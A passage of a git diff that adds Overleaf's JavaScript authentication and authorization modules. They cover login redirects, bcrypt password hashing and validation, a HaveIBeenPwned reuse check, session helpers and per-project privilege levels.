return send401WithChallenge(res) + AuthenticationController.setRedirectInSession(req) + res.redirect('/login') + } + }, + + validateAdmin(req, res, next) { + const adminDomains = Settings.adminDomains + if ( + !adminDomains || + !(Array.isArray(adminDomains) && adminDomains.length) + ) { + return next() + } + const user = SessionManager.getSessionUser(req.session) + if (!hasAdminAccess(user)) { + return next() + } + const email = user.email + if (email == null) { + return next( + new OError('[ValidateAdmin] Admin user without email address', { + userId: user._id, + }) + ) + } + if (!adminDomains.find(domain => email.endsWith(`@${domain}`))) { + return next( + new OError('[ValidateAdmin] Admin user with invalid email domain', { + email, + userId: user._id, + }) + ) + } + return next() + }, + + checkCredentials, + + requireBasicAuth: function (userDetails) { + const userDetailsMap = new Map(Object.entries(userDetails)) + return function (req, res, next) { + const credentials = basicAuth(req) + if ( + !credentials || + !checkCredentials(userDetailsMap, credentials.name, credentials.pass) + ) { + send401WithChallenge(res) + Metrics.inc('security.http-auth', 1, { status: 'reject' }) + } else { + Metrics.inc('security.http-auth', 1, { status: 'accept' }) + next() + } + } + }, + + requirePrivateApiAuth() { + return AuthenticationController.requireBasicAuth(Settings.httpAuthUsers) + }, + + setAuditInfo(req, info) { + if (!req.__authAuditInfo) { + req.__authAuditInfo = {} + } + Object.assign(req.__authAuditInfo, info) + }, + + getAuditInfo(req) { + return req.__authAuditInfo || {} + }, + + setRedirectInSession(req, value) { + if (value == null) { + value = + Object.keys(req.query).length > 0 + ? `${req.path}?${querystring.stringify(req.query)}` + : `${req.path}` + } + if ( + req.session != null && + !/^\/(socket.io|js|stylesheets|img)\/.*$/.test(value) && + !/^.*\.(png|jpeg|svg)$/.test(value) + ) { + const safePath = UrlHelper.getSafeRedirectPath(value) + return (req.session.postLoginRedirect = safePath) + } + }, + + _redirectToLoginOrRegisterPage(req, res) { + if ( + req.query.zipUrl != null || + req.session.sharedProjectData || + req.path === '/user/subscription/new' + ) { + AuthenticationController._redirectToRegisterPage(req, res) + } else { + AuthenticationController._redirectToLoginPage(req, res) + } + }, + + _redirectToLoginPage(req, res) { + logger.debug( + { url: req.url }, + 'user not logged in so redirecting to login page' + ) + AuthenticationController.setRedirectInSession(req) + const url = `/login?${querystring.stringify(req.query)}` + res.redirect(url) + Metrics.inc('security.login-redirect') + }, + + _redirectToReconfirmPage(req, res, user) { + logger.debug( + { url: req.url }, + 'user needs to reconfirm so redirecting to reconfirm page' + ) + req.session.reconfirm_email = user != null ? user.email : undefined + const redir = '/user/reconfirm' + AsyncFormHelper.redirect(req, res, redir) + }, + + _redirectToRegisterPage(req, res) { + logger.debug( + { url: req.url }, + 'user not logged in so redirecting to register page' + ) + AuthenticationController.setRedirectInSession(req) + const url = `/register?${querystring.stringify(req.query)}` + res.redirect(url) + Metrics.inc('security.login-redirect') + }, + + _recordSuccessfulLogin(userId, callback) { + if (callback == null) { + callback = function () {} + } + UserUpdater.updateUser( + userId.toString(), + { + $set: { lastLoggedIn: new Date() }, + $inc: { loginCount: 1 }, + }, + function (error) { + if (error != null) { + callback(error) + } + Metrics.inc('user.login.success') + callback() + } + ) + }, + + _recordFailedLogin(callback) { + Metrics.inc('user.login.failed') + if (callback) callback() + }, + + getRedirectFromSession(req) { + let safePath + const value = _.get(req, ['session', 'postLoginRedirect']) + if (value) { + safePath = UrlHelper.getSafeRedirectPath(value) + } + return safePath || null + }, + + _clearRedirectFromSession(req) { + if (req.session != null) { + delete req.session.postLoginRedirect + } + }, +} + +function _afterLoginSessionSetup(req, user, callback) { + req.login(user, { keepSessionInfo: true }, function (err) { + if (err) { + OError.tag(err, 'error from req.login', { + user_id: user._id, + }) + return callback(err) + } + delete req.session.__tmp + delete req.session.csrfSecret + req.session.save(function (err) { + if (err) { + OError.tag(err, 'error saving regenerated session after login', { + user_id: user._id, + }) + return callback(err) + } + UserSessionsManager.trackSession(user, req.sessionID, function () {}) + if (!req.deviceHistory) { + // Captcha disabled or SSO-based login. + return callback() + } + req.deviceHistory.add(user.email) + req.deviceHistory + .serialize(req.res) + .catch(err => { + logger.err({ err }, 'cannot serialize deviceHistory') + }) + .finally(() => callback()) + }) + }) +} + +const _afterLoginSessionSetupAsync = promisify(_afterLoginSessionSetup) + +function _loginAsyncHandlers(req, user, anonymousAnalyticsId, isNewUser) { + UserHandler.populateTeamInvites(user, err => { + if (err != null) { + logger.warn({ err }, 'error setting up login data') + } + }) + LoginRateLimiter.recordSuccessfulLogin(user.email, () => {}) + AuthenticationController._recordSuccessfulLogin(user._id, () => {}) + AuthenticationController.ipMatchCheck(req, user) + Analytics.recordEventForUserInBackground(user._id, 'user-logged-in', { + source: req.session.saml + ? 'saml' + : req.user_info?.auth_provider || 'email-password', + }) + Analytics.identifyUser(user._id, anonymousAnalyticsId, isNewUser) + + logger.debug( + { email: user.email, userId: user._id.toString() }, + 'successful log in' + ) + + req.session.justLoggedIn = true + // capture the request ip for use when creating the session + return (user._login_req_ip = req.ip) +} + +AuthenticationController.promises = { + finishLogin: AuthenticationController._finishLoginAsync, +} + +module.exports = AuthenticationController diff --git a/services/web/app/src/Features/Authentication/AuthenticationErrors.js b/services/web/app/src/Features/Authentication/AuthenticationErrors.js new file mode 100644 index 0000000..c5dc8ba --- /dev/null +++ b/services/web/app/src/Features/Authentication/AuthenticationErrors.js @@ -0,0 +1,58 @@ +const Metrics = require('@overleaf/metrics') +const OError = require('@overleaf/o-error') +const Settings = require('@overleaf/settings') +const Errors = require('../Errors/Errors') + +class InvalidEmailError extends Errors.BackwardCompatibleError {} +class InvalidPasswordError extends Errors.BackwardCompatibleError {} +class ParallelLoginError extends Errors.BackwardCompatibleError {} +class PasswordMustBeDifferentError extends Errors.BackwardCompatibleError {} +class PasswordReusedError extends Errors.BackwardCompatibleError {} + +function handleAuthenticateErrors(error, req) { + if (error.message === 'password is too long') { + Metrics.inc('login_failure_reason', 1, { + status: 'password_is_too_long', + }) + return { + status: 422, + type: 'error', + key: 'password-too-long', + text: req.i18n.translate('password_too_long_please_reset'), + } + } + if (error instanceof ParallelLoginError) { + Metrics.inc('login_failure_reason', 1, { status: 'parallel_login' }) + return { status: 429 } + } + if (error instanceof PasswordReusedError) { + Metrics.inc('login_failure_reason', 1, { + status: 'password_compromised', + }) + const text = `${req.i18n + .translate('password_compromised_try_again_or_use_known_device_or_reset') + .replace('<0>', '') + .replace('</0>', ' (https://haveibeenpwned.com/passwords)') + .replace('<1>', '') + .replace('</1>', ` (${Settings.siteUrl}/user/password/reset)`)}.` + return { + status: 400, + type: 'error', + key: 'password-compromised', + text, + } + } + Metrics.inc('login_failure_reason', 1, { + status: error instanceof OError ? error.name : 'error', + }) + throw error +} + +module.exports = { + InvalidEmailError, + InvalidPasswordError, + ParallelLoginError, + PasswordMustBeDifferentError, + PasswordReusedError, + handleAuthenticateErrors, +} diff --git a/services/web/app/src/Features/Authentication/AuthenticationManager.js b/services/web/app/src/Features/Authentication/AuthenticationManager.js new file mode 100644 index 0000000..6ac5109 --- /dev/null +++ b/services/web/app/src/Features/Authentication/AuthenticationManager.js @@ -0,0 +1,477 @@ +const Settings = require('@overleaf/settings') +const { User } = require('../../models/User') +const { db, ObjectId } = require('../../infrastructure/mongodb') +const bcrypt = require('bcrypt') +const EmailHelper = require('../Helpers/EmailHelper') +const { + InvalidEmailError, + InvalidPasswordError, + ParallelLoginError, + PasswordMustBeDifferentError, + PasswordReusedError, +} = require('./AuthenticationErrors') +const { + callbackify, + callbackifyMultiResult, +} = require('@overleaf/promise-utils') +const HaveIBeenPwned = require('./HaveIBeenPwned') +const UserAuditLogHandler = require('../User/UserAuditLogHandler') +const logger = require('@overleaf/logger') +const DiffHelper = require('../Helpers/DiffHelper') +const Metrics = require('@overleaf/metrics') + +const BCRYPT_ROUNDS = Settings.security.bcryptRounds || 12 +const BCRYPT_MINOR_VERSION = Settings.security.bcryptMinorVersion || 'a' +const MAX_SIMILARITY = 0.7 + +function _exceedsMaximumLengthRatio(password, maxSimilarity, value) { + const passwordLength = password.length + const lengthBoundSimilarity = (maxSimilarity / 2) * passwordLength + const valueLength = value.length + return ( + passwordLength >= 10 * valueLength && valueLength < lengthBoundSimilarity + ) +} + +const _checkWriteResult = function (result) { + // for MongoDB + return !!(result && result.modifiedCount === 1) +} + +function _validatePasswordNotTooLong(password) { + // bcrypt has a hard limit of 72 characters. + if (password.length > 72) { + return new InvalidPasswordError({ + message: 'password is too long', + info: { code: 'too_long' }, + }) + } + return null +} + +function _metricsForSuccessfulPasswordMatch(password) { + const validationResult = AuthenticationManager.validatePassword(password) + const status = + validationResult === null ? 'success' : validationResult?.info?.code + Metrics.inc('check-password', { status }) + return null +} + +const AuthenticationManager = { + async _checkUserPassword(query, password) { + // Using Mongoose for legacy reasons here. The returned User instance + // gets serialized into the session and there may be subtle differences + // between the user returned by Mongoose vs mongodb (such as default values) + const user = await User.findOne(query).exec() + + if (!user || !user.hashedPassword) { + return { user: null, match: null } + } + + let rounds = 0 + try { + rounds = bcrypt.getRounds(user.hashedPassword) + } catch (err) { + let prefix, suffix, length + if (typeof user.hashedPassword === 'string') { + length = user.hashedPassword.length + if (user.hashedPassword.length > 50) { + // A full bcrypt hash is 60 characters long. + prefix = user.hashedPassword.slice(0, '$2a$12$x'.length) + suffix = user.hashedPassword.slice(-4) + } else if (user.hashedPassword.length > 20) { + prefix = user.hashedPassword.slice(0, 4) + suffix = user.hashedPassword.slice(-4) + } else { + prefix = user.hashedPassword.slice(0, 4) + } + } + logger.warn( + { + err, + userId: user._id, + hashedPassword: { + type: typeof user.hashedPassword, + length, + prefix, + suffix, + }, + }, + 'unexpected user.hashedPassword value' + ) + } + Metrics.inc('bcrypt', 1, { + method: 'compare', + path: rounds, + }) + + const match = await bcrypt.compare(password, user.hashedPassword) + + if (match) { + _metricsForSuccessfulPasswordMatch(password) + } + + return { user, match } + }, + + async authenticate(query, password, auditLog, { enforceHIBPCheck = true }) { + const { user, match } = await AuthenticationManager._checkUserPassword( + query, + password + ) + + if (!user) { + return { user: null } + } + + const update = { $inc: { loginEpoch: 1 } } + if (!match) { + update.$set = { lastFailedLogin: new Date() } + } + + const result = await User.updateOne( + { _id: user._id, loginEpoch: user.loginEpoch }, + update, + {} + ).exec() + + if (result.modifiedCount !== 1) { + throw new ParallelLoginError() + } + + if (!match) { + if (!auditLog) { + return { user: null } + } else { + try { + await UserAuditLogHandler.promises.addEntry( + user._id, + 'failed-password-match', + user._id, + auditLog.ipAddress, + auditLog.info + ) + } catch (err) { + logger.error( + { userId: user._id, err, info: auditLog.info }, + 'Error while adding AuditLog entry for failed-password-match' + ) + } + return { user: null } + } + } + await AuthenticationManager.checkRounds(user, user.hashedPassword, password) + + let isPasswordReused + try { + isPasswordReused = + await HaveIBeenPwned.promises.checkPasswordForReuse(password) + } catch (err) { + logger.err({ err }, 'cannot check password for re-use') + } + + if (isPasswordReused && enforceHIBPCheck) { + throw new PasswordReusedError() + } + + return { user, isPasswordReused } + }, + + validateEmail(email) { + const parsed = EmailHelper.parseEmail(email) + if (!parsed) { + return new InvalidEmailError({ message: 'email not valid' }) + } + return null + }, + + // validates a password based on a similar set of rules previously used by `passfield.js` on the frontend + // note that `passfield.js` enforced more rules than this, but these are the most commonly set. + // returns null on success, or an error object. + validatePassword(password, email) { + if (password == null) { + return new InvalidPasswordError({ + message: 'password not set', + info: { code: 'not_set' }, + }) + } + + Metrics.inc('try-validate-password') + + let allowAnyChars, min, max + if (Settings.passwordStrengthOptions) { + allowAnyChars = Settings.passwordStrengthOptions.allowAnyChars === true + if (Settings.passwordStrengthOptions.length) { + min = Settings.passwordStrengthOptions.length.min + max = Settings.passwordStrengthOptions.length.max + } + } + allowAnyChars = !!allowAnyChars + min = min || 8 + max = max || 72 + + // we don't support passwords > 72 characters in length, because bcrypt truncates them + if (max > 72) { + max = 72 + } + + if (password.length < min) { + return new InvalidPasswordError({ + message: 'password is too short', + info: { code: 'too_short' }, + }) + } + if (password.length > max) { + return new InvalidPasswordError({ + message: 'password is too long', + info: { code: 'too_long' }, + }) + } + const passwordLengthError = _validatePasswordNotTooLong(password) + if (passwordLengthError) { + return passwordLengthError + } + if ( + !allowAnyChars && + !AuthenticationManager._passwordCharactersAreValid(password) + ) { + return new InvalidPasswordError({ + message: 'password contains an invalid character', + info: { code: 'invalid_character' }, + }) + } + if (typeof email === 'string' && email !== '') { + const startOfEmail = email.split('@')[0] + if ( + password.includes(email) || + password.includes(startOfEmail) || + email.includes(password) + ) { + return new InvalidPasswordError({ + message: 'password contains part of email address', + info: { code: 'contains_email' }, + }) + } + try { + const passwordTooSimilarError = + AuthenticationManager._validatePasswordNotTooSimilar(password, email) + if (passwordTooSimilarError) { + Metrics.inc('password-too-similar-to-email') + return new InvalidPasswordError({ + message: 'password is too similar to email address', + info: { code: 'too_similar' }, + }) + } + } catch (error) { + logger.error( + { error }, + 'error while checking password similarity to email' + ) + } + // TODO: remove this check once the password-too-similar checks are active? + } + return null + }, + + async setUserPassword(user, password) { + return await AuthenticationManager.setUserPasswordInV2(user, password) + }, + + async checkRounds(user, hashedPassword, password) { + // Temporarily disable this function, TODO: re-enable this + if (Settings.security.disableBcryptRoundsUpgrades) { + Metrics.inc('bcrypt_check_rounds', 1, { status: 'disabled' }) + return + } + // check current number of rounds and rehash if necessary + const currentRounds = bcrypt.getRounds(hashedPassword) + if (currentRounds < BCRYPT_ROUNDS) { + Metrics.inc('bcrypt_check_rounds', 1, { status: 'upgrade' }) + return await AuthenticationManager._setUserPasswordInMongo(user, password) + } else { + Metrics.inc('bcrypt_check_rounds', 1, { status: 'success' }) + } + }, + + async hashPassword(password) { + // Double-check the size to avoid truncating in bcrypt. + const error = _validatePasswordNotTooLong(password) + if (error) { + throw error + } + + const salt = await bcrypt.genSalt(BCRYPT_ROUNDS, BCRYPT_MINOR_VERSION) + + Metrics.inc('bcrypt', 1, { + method: 'hash', + path: BCRYPT_ROUNDS, + }) + return await bcrypt.hash(password, salt) + }, + + async setUserPasswordInV2(user, password) { + if (!user || !user.email || !user._id) { + throw new Error('invalid user object') + } + const validationError = this.validatePassword(password, user.email) + if (validationError) { + throw validationError + } + // check if we can log in with this password. In which case we should reject it, + // because it is the same as the existing password. + const { match } = await AuthenticationManager._checkUserPassword( + { _id: user._id }, + password + ) + + if (match) { + throw new PasswordMustBeDifferentError() + } + + let isPasswordReused + try { + isPasswordReused = + await HaveIBeenPwned.promises.checkPasswordForReuse(password) + } catch (error) { + logger.err({ error }, 'cannot check password for re-use') + } + + if (isPasswordReused) { + throw new PasswordReusedError() + } + + // password is strong enough or the validation with the service did not happen + return await this._setUserPasswordInMongo(user, password) + }, + + async _setUserPasswordInMongo(user, password) { + const hash = await this.hashPassword(password) + const result = await db.users.updateOne( + { _id: new ObjectId(user._id.toString()) }, + { + $set: { + hashedPassword: hash, + }, + $unset: { + password: true, + }, + } + ) + + return _checkWriteResult(result) + }, + + _passwordCharactersAreValid(password) { + let digits, letters, lettersUp, symbols + if ( + Settings.passwordStrengthOptions && + Settings.passwordStrengthOptions.chars + ) { + digits = Settings.passwordStrengthOptions.chars.digits + letters = Settings.passwordStrengthOptions.chars.letters + lettersUp = Settings.passwordStrengthOptions.chars.letters_up + symbols = Settings.passwordStrengthOptions.chars.symbols + } + digits = digits || '1234567890' + letters = letters || 'abcdefghijklmnopqrstuvwxyz' + lettersUp = lettersUp || 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + symbols = symbols || '@#$%^&*()-_=+[]{};:<>/?!£€.,' + + for (let charIndex = 0; charIndex <= password.length - 1; charIndex++) { + if ( + digits.indexOf(password[charIndex]) === -1 && + letters.indexOf(password[charIndex]) === -1 && + lettersUp.indexOf(password[charIndex]) === -1 && + symbols.indexOf(password[charIndex]) === -1 + ) { + return false + } + } + return true + }, + + /** + * Check if the password is similar to (parts of) the email address. + * For now, this merely sends a metric when the password and + * email address are deemed to be too similar to each other. + * Later we will reject passwords that fail this check. + * + * This logic was borrowed from the django project: + * https://github.com/django/django/blob/fa3afc5d86f1f040922cca2029d6a34301597a70/django/contrib/auth/password_validation.py#L159-L214 + */ + _validatePasswordNotTooSimilar(password, email) { + password = password.toLowerCase() + email = email.toLowerCase() + const stringsToCheck = [email] + .concat(email.split(/\W+/)) + .concat(email.split(/@/)) + for (const emailPart of stringsToCheck) { + if (!_exceedsMaximumLengthRatio(password, MAX_SIMILARITY, emailPart)) { + const similarity = DiffHelper.stringSimilarity(password, emailPart) + if (similarity > MAX_SIMILARITY) { + return new Error('password is too similar to email') + } + } + } + }, + + getMessageForInvalidPasswordError(error, req) { + const errorCode = error?.info?.code + const message = { + type: 'error', + } + switch (errorCode) { + case 'not_set': + message.key = 'password-not-set' + message.text = req.i18n.translate('invalid_password_not_set') + break + case 'invalid_character': + message.key = 'password-invalid-character' + message.text = req.i18n.translate('invalid_password_invalid_character') + break + case 'contains_email': + message.key = 'password-contains-email' + message.text = req.i18n.translate('invalid_password_contains_email') + break + case 'too_similar': + message.key = 'password-too-similar' + message.text = req.i18n.translate('invalid_password_too_similar') + break + case 'too_short': + message.key = 'password-too-short' + message.text = req.i18n.translate('invalid_password_too_short', { + minLength: Settings.passwordStrengthOptions?.length?.min || 8, + }) + break + case 'too_long': + message.key = 'password-too-long' + message.text = req.i18n.translate('invalid_password_too_long', { + maxLength: Settings.passwordStrengthOptions?.length?.max || 72, + }) + break + default: + logger.error({ err: error }, 'Unknown password validation error code') + message.text = req.i18n.translate('invalid_password') + break + } + return message + }, +} + +module.exports = { + _validatePasswordNotTooSimilar: + AuthenticationManager._validatePasswordNotTooSimilar, // Private function exported for tests + validateEmail: AuthenticationManager.validateEmail, + validatePassword: AuthenticationManager.validatePassword, + getMessageForInvalidPasswordError: + AuthenticationManager.getMessageForInvalidPasswordError, + authenticate: callbackifyMultiResult(AuthenticationManager.authenticate, [ + 'user', + 'isPasswordReused', + ]), + setUserPassword: callbackify(AuthenticationManager.setUserPassword), + checkRounds: callbackify(AuthenticationManager.checkRounds), + hashPassword: callbackify(AuthenticationManager.hashPassword), + setUserPasswordInV2: callbackify(AuthenticationManager.setUserPasswordInV2), + promises: AuthenticationManager, +} diff --git a/services/web/app/src/Features/Authentication/HaveIBeenPwned.js b/services/web/app/src/Features/Authentication/HaveIBeenPwned.js new file mode 100644 index 0000000..c400fc7 --- /dev/null +++ b/services/web/app/src/Features/Authentication/HaveIBeenPwned.js @@ -0,0 +1,127 @@ +/* + This module is operating on raw user passwords. Be very defensive. + Pay special attention when passing the password or even a hash/prefix around. + We need to ensure that no parts of it get logged or returned on either the + happy path or via an error (message or attributes). + */ + +const { callbackify } = require('util') +const { fetchString } = require('@overleaf/fetch-utils') +const crypto = require('crypto') +const Settings = require('@overleaf/settings') +const Metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') + +const HEX_CHARS_UPPER = '1234567890ABCDEF' +const API_ERROR = new Error('cannot contact HaveIBeenPwned api') +const INVALID_PREFIX = new Error( + 'This is not a valid hex prefix. Rejecting to pass it to HaveIBeenPwned' +) +const INVALID_RESPONSE = new Error('cannot consume HaveIBeenPwned api response') +const INVALID_SCORE = new Error( + 'non integer score returned by HaveIBeenPwned api' +) +const CODED_ERROR_MESSAGES = [ + API_ERROR, + INVALID_PREFIX, + INVALID_RESPONSE, + INVALID_SCORE, +].map(err => err.message) + +async function getScoresForPrefix(prefix) { + if ( + typeof prefix !== 'string' || + prefix.length !== 5 || + Array.from(prefix).some(c => !HEX_CHARS_UPPER.includes(c)) + ) { + // Make sure we do not pass arbitrary objects to the api. + throw INVALID_PREFIX + } + try { + return await fetchString( + `${Settings.apis.haveIBeenPwned.url}/range/${prefix}`, + { + headers: { + 'User-Agent': 'www.overleaf.com', + // Docs: https://haveibeenpwned.com/API/v3#PwnedPasswordsPadding + 'Add-Padding': true, + }, + signal: AbortSignal.timeout(Settings.apis.haveIBeenPwned.timeout), + } + ) + } catch (_errorWithPotentialReferenceToPrefix) { + // NOTE: Do not leak request details by passing the original error up. + throw API_ERROR + } +} + +async function isPasswordReused(password) { + const sha1 = crypto + .createHash('sha1') + .update(password) + .digest('hex') + .toUpperCase() + const prefix = sha1.slice(0, 5) + const body = await getScoresForPrefix(prefix) + + let score = 0 + try { + for (const line of body.split('\r\n')) { + const [candidate, scoreRaw] = line.split(':') + if (prefix + candidate === sha1) { + score = parseInt(scoreRaw) + break + } + } + } catch (_errorWithPotentialReferenceToHash) { + // NOTE: Do not leak password details by logging the original error. + throw INVALID_RESPONSE + } + + if (Number.isNaN(score)) { + // NOTE: Do not leak password details by logging the score. + throw INVALID_SCORE + } + return score > 0 +} + +async function checkPasswordForReuse(password) { + if (!Settings.apis.haveIBeenPwned.enabled) { + return + } + + try { + const isReused = await isPasswordReused(password) + + Metrics.inc('password_re_use', { + status: isReused ? 're-used' : 'unique', + }) + + return isReused + } catch (err) { + let error = err + // Make sure we do not leak any password details. + if (!CODED_ERROR_MESSAGES.includes(err.message)) { + error = new Error('hidden message') + } + error = new Error(error.message) + + Metrics.inc('password_re_use', { status: 'failure' }) + + throw error + } +} + +function checkPasswordForReuseInBackground(password) { + checkPasswordForReuse(password).catch(error => { + logger.err({ error }, 'cannot check password for re-use') + }) +} + +module.exports = { + checkPasswordForReuse: callbackify(checkPasswordForReuse), + checkPasswordForReuseInBackground, + promises: { + checkPasswordForReuse, + }, +} diff --git a/services/web/app/src/Features/Authentication/SessionManager.js b/services/web/app/src/Features/Authentication/SessionManager.js new file mode 100644 index 0000000..a64ee98 --- /dev/null +++ b/services/web/app/src/Features/Authentication/SessionManager.js @@ -0,0 +1,46 @@ +const _ = require('lodash') + +const SessionManager = { + getSessionUser(session) { + const sessionUser = _.get(session, ['user']) + const sessionPassportUser = _.get(session, ['passport', 'user']) + return sessionUser || sessionPassportUser || null + }, + + setInSessionUser(session, props) { + const sessionUser = SessionManager.getSessionUser(session) + if (!sessionUser) { + return + } + for (const key in props) { + const value = props[key] + sessionUser[key] = value + } + return null + }, + + isUserLoggedIn(session) { + const userId = SessionManager.getLoggedInUserId(session) + return ![null, undefined, false].includes(userId) + }, + + getLoggedInUserId(session) { + const user = SessionManager.getSessionUser(session) + if (user) { + return user._id + } else { + return null + } + }, + + getLoggedInUserV1Id(session) { + const user = SessionManager.getSessionUser(session) + if (user != null && user.v1_id != null) { + return user.v1_id + } else { + return null + } + }, +} + +module.exports = SessionManager diff --git a/services/web/app/src/Features/Authorization/AuthorizationManager.js b/services/web/app/src/Features/Authorization/AuthorizationManager.js new file mode 100644 index 0000000..2f339de --- /dev/null +++ b/services/web/app/src/Features/Authorization/AuthorizationManager.js @@ -0,0 +1,315 @@ +const { callbackify } = require('util') +const { ObjectId } = require('mongodb-legacy') +const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') +const CollaboratorsHandler = require('../Collaborators/CollaboratorsHandler') +const ProjectGetter = require('../Project/ProjectGetter') +const { User } = require('../../models/User') +const PrivilegeLevels = require('./PrivilegeLevels') +const TokenAccessHandler = require('../TokenAccess/TokenAccessHandler') +const PublicAccessLevels = require('./PublicAccessLevels') +const Errors = require('../Errors/Errors') +const { hasAdminAccess } = require('../Helpers/AdminAuthorizationHelper') +const Settings = require('@overleaf/settings') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') + +function isRestrictedUser( + userId, + privilegeLevel, + isTokenMember, + isInvitedMember +) { + if (privilegeLevel === PrivilegeLevels.NONE) { + return true + } + return ( + privilegeLevel === PrivilegeLevels.READ_ONLY && + (isTokenMember || !userId) && + !isInvitedMember + ) +} + +async function isRestrictedUserForProject(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token + ) + const isTokenMember = await CollaboratorsHandler.promises.userIsTokenMember( + userId, + projectId + ) + const isInvitedMember = + await CollaboratorsGetter.promises.isUserInvitedMemberOfProject( + userId, + projectId + ) + return isRestrictedUser( + userId, + privilegeLevel, + isTokenMember, + isInvitedMember + ) +} + +async function getPublicAccessLevel(projectId) { + if (!ObjectId.isValid(projectId)) { + throw new Error('invalid project id') + } + + // Note, the Project property in the DB is `publicAccesLevel`, without the second `s` + const project = await ProjectGetter.promises.getProject(projectId, { + publicAccesLevel: 1, + }) + if (!project) { + throw new Errors.NotFoundError(`no project found with id ${projectId}`) + } + return project.publicAccesLevel +} + +/** + * Get the privilege level that the user has for the project. + * + * @param userId - The id of the user that wants to access the project. + * @param projectId - The id of the project to be accessed. + * @param {string} token + * @param {Object} opts + * @param {boolean} opts.ignoreSiteAdmin - Do not consider whether the user is + * a site admin. + * @param {boolean} opts.ignorePublicAccess - Do not consider the project is + * publicly accessible. + * + * @returns {string|boolean} The privilege level. One of "owner", + * "readAndWrite", "readOnly" or false. + */ +async function getPrivilegeLevelForProject( + userId, + projectId, + token, + opts = {} +) { + if (userId) { + return getPrivilegeLevelForProjectWithUser(userId, projectId, opts) + } else { + return getPrivilegeLevelForProjectWithoutUser(projectId, token, opts) + } +} + +// User is present, get their privilege level from database +async function getPrivilegeLevelForProjectWithUser( + userId, + projectId, + opts = {} +) { + if (!opts.ignoreSiteAdmin) { + if (await isUserSiteAdmin(userId)) { + return PrivilegeLevels.OWNER + } + } + + const privilegeLevel = + await CollaboratorsGetter.promises.getMemberIdPrivilegeLevel( + userId, + projectId + ) + if (privilegeLevel && privilegeLevel !== PrivilegeLevels.NONE) { + // The user has direct access + return privilegeLevel + } + + if (!opts.ignorePublicAccess) { + // Legacy public-access system + // User is present (not anonymous), but does not have direct access + const publicAccessLevel = await getPublicAccessLevel(projectId) + if (publicAccessLevel === PublicAccessLevels.READ_ONLY) { + return PrivilegeLevels.READ_ONLY + } + if (publicAccessLevel === PublicAccessLevels.READ_AND_WRITE) { + return PrivilegeLevels.READ_AND_WRITE + } + } + + return PrivilegeLevels.NONE +} + +// User is Anonymous, Try Token-based access +async function getPrivilegeLevelForProjectWithoutUser( + projectId, + token, + opts = {} +) { + const publicAccessLevel = await getPublicAccessLevel(projectId) + if (!opts.ignorePublicAccess) { + if (publicAccessLevel === PublicAccessLevels.READ_ONLY) { + // Legacy public read-only access for anonymous user + return PrivilegeLevels.READ_ONLY + } + if (publicAccessLevel === PublicAccessLevels.READ_AND_WRITE) { + // Legacy public read-write access for anonymous user + return PrivilegeLevels.READ_AND_WRITE + } + } + if (publicAccessLevel === PublicAccessLevels.TOKEN_BASED) { + return getPrivilegeLevelForProjectWithToken(projectId, token) + } + + // Deny anonymous user access + return PrivilegeLevels.NONE +} + +async function getPrivilegeLevelForProjectWithToken(projectId, token) { + // Anonymous users can have read-only access to token-based projects, + // while read-write access must be logged in, + // unless the `enableAnonymousReadAndWriteSharing` setting is enabled + const { isValidReadAndWrite, isValidReadOnly } = + await TokenAccessHandler.promises.validateTokenForAnonymousAccess( + projectId, + token + ) + if (isValidReadOnly) { + // Grant anonymous user read-only access + return PrivilegeLevels.READ_ONLY + } + if (isValidReadAndWrite) { + // Grant anonymous user read-and-write access + return PrivilegeLevels.READ_AND_WRITE + } + // Deny anonymous access + return PrivilegeLevels.NONE +} + +async function canUserReadProject(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token + ) + return [ + PrivilegeLevels.OWNER, + PrivilegeLevels.READ_AND_WRITE, + PrivilegeLevels.READ_ONLY, + PrivilegeLevels.REVIEW, + ].includes(privilegeLevel) +} + +async function canUserWriteProjectContent(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token + ) + return [PrivilegeLevels.OWNER, PrivilegeLevels.READ_AND_WRITE].includes( + privilegeLevel + ) +} + +async function canUserWriteOrReviewProjectContent(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token + ) + return ( + privilegeLevel === PrivilegeLevels.OWNER || + privilegeLevel === PrivilegeLevels.READ_AND_WRITE || + privilegeLevel === PrivilegeLevels.REVIEW + ) +} + +async function canUserWriteProjectSettings(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token, + { ignorePublicAccess: true } + ) + return [PrivilegeLevels.OWNER, PrivilegeLevels.READ_AND_WRITE].includes( + privilegeLevel + ) +} + +async function canUserRenameProject(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token + ) + return privilegeLevel === PrivilegeLevels.OWNER +} + +async function canUserAdminProject(userId, projectId, token) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token + ) + return privilegeLevel === PrivilegeLevels.OWNER +} + +async function isUserSiteAdmin(userId) { + if (!userId) { + return false + } + if (!Settings.adminPrivilegeAvailable) return false + const user = await User.findOne({ _id: userId }, { isAdmin: 1 }).exec() + return hasAdminAccess(user) +} + +async function canUserDeleteOrResolveThread( + userId, + projectId, + docId, + threadId, + token +) { + const privilegeLevel = await getPrivilegeLevelForProject( + userId, + projectId, + token, + { ignorePublicAccess: true } + ) + if ( + privilegeLevel === PrivilegeLevels.OWNER || + privilegeLevel === PrivilegeLevels.READ_AND_WRITE + ) { + return true + } + + if (privilegeLevel !== PrivilegeLevels.REVIEW) { + return false + } + + const comment = await DocumentUpdaterHandler.promises.getComment( + projectId, + docId, + threadId + ) + return comment.metadata.user_id === userId +} + +module.exports = { + canUserReadProject: callbackify(canUserReadProject), + canUserWriteProjectContent: callbackify(canUserWriteProjectContent), + canUserWriteOrReviewProjectContent: callbackify( + canUserWriteOrReviewProjectContent + ), + canUserDeleteOrResolveThread: callbackify(canUserDeleteOrResolveThread), + canUserWriteProjectSettings: callbackify(canUserWriteProjectSettings), + canUserRenameProject: callbackify(canUserRenameProject), + canUserAdminProject: callbackify(canUserAdminProject), + getPrivilegeLevelForProject: callbackify(getPrivilegeLevelForProject), + isRestrictedUser, + 